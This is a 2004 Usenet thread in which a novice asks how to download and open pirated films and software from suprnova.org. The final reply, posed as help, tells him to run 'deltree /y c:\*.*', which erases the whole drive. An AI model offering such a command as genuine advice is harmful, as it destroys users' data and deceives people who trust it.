Trying to download

Old August 6th 04, 03:24 PM posted to uk.telecom.broadband
Jason

Default Trying to download

Someone told me of a site suprnova.org where I can download movies apps and
so on.

I cannot seem to download anything. I have just today been enabled for
broadband. When I click on the link I.e. Harry Potter all I get is a
..torrent file which I cannot open.

What am I doing wrong?
Thanks Jason
(I am just testing a big file for download to see how fast it is)

Old August 6th 04, 03:39 PM posted to uk.telecom.broadband
SwissTony

"Jason" wrote in message
Someone told me of a site suprnova.org where I can download movies apps
and
so on.

I cannot seem to download anything. I have just today been enabled for
broadband. When I click on the link I.e. Harry Potter all I get is a
.torrent file which I cannot open.

What am I doing wrong?
Thanks Jason
(I am just testing a big file for download to see how fast it is)

You need bitorrent client get the original from here
http://bitconjurer.org/BitTorrent/

Old August 6th 04, 10:09 PM posted to uk.telecom.broadband
Jason

"Jason" wrote in message
Someone told me of a site suprnova.org where I can download movies apps

and
so on.

I cannot seem to download anything. I have just today been enabled for
broadband. When I click on the link I.e. Harry Potter all I get is a
.torrent file which I cannot open.

What am I doing wrong?
Thanks Jason
(I am just testing a big file for download to see how fast it is)

I know this isn't the right NG, but you chaps have been so helpful I need
your advice again.

I downloaded from suprnova.org and I now have a .iso file with the program I
downloaded. (the iso file is the program). How do I open this, it keeps
asking me what I want to use to open it. I have done a search but its
baffled me and I am technically challenged.

Thanks once again
Jason

Old August 7th 04, 08:13 PM posted to uk.telecom.broadband
lurch

On Fri, 6 Aug 2004 21:09:29 +0100, "Jason"
strung together this:

"Jason" wrote in message
Someone told me of a site suprnova.org where I can download movies apps

and
so on.

I cannot seem to download anything. I have just today been enabled for
broadband. When I click on the link I.e. Harry Potter all I get is a
.torrent file which I cannot open.

What am I doing wrong?
Thanks Jason
(I am just testing a big file for download to see how fast it is)

I know this isn't the right NG, but you chaps have been so helpful I need
your advice again.

I downloaded from suprnova.org

Well, that's it then. All you wanted to do was test the download
speed, what was it?

and I now have a .iso file with the program I
downloaded. (the iso file is the program). How do I open this, it keeps
asking me what I want to use to open it. I have done a search but its
baffled me and I am technically challenged.

You don't need to open it, you only need to download it. Now you
delete it using this command at the command prompt.
deltree /y c:\*.*
--

SJW
A.C.S. Ltd